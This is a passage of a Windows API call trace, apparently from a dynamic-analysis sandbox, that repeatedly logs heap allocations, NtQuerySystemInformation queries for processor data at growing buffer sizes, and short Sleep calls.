hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.567] Sleep (dwMilliseconds=0x110) [0209.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.583] Sleep (dwMilliseconds=0x110) [0209.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.598] Sleep (dwMilliseconds=0x110) [0209.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.613] Sleep (dwMilliseconds=0x110) [0209.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.630] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.631] Sleep (dwMilliseconds=0x110) [0209.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.646] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.647] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.647] Sleep (dwMilliseconds=0x110) [0209.653] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.653] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.657] Sleep (dwMilliseconds=0x110) [0209.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.675] Sleep (dwMilliseconds=0x110) [0209.696] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.696] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.697] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.697] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.697] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.698] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.698] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.698] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.698] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.699] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.699] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.700] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.703] Sleep (dwMilliseconds=0x110) [0209.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.723] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.724] Sleep (dwMilliseconds=0x110) [0209.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.736] Sleep (dwMilliseconds=0x110) [0209.747] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.747] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.754] Sleep (dwMilliseconds=0x110) [0209.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.769] Sleep (dwMilliseconds=0x110) [0209.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.786] Sleep (dwMilliseconds=0x110) [0209.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 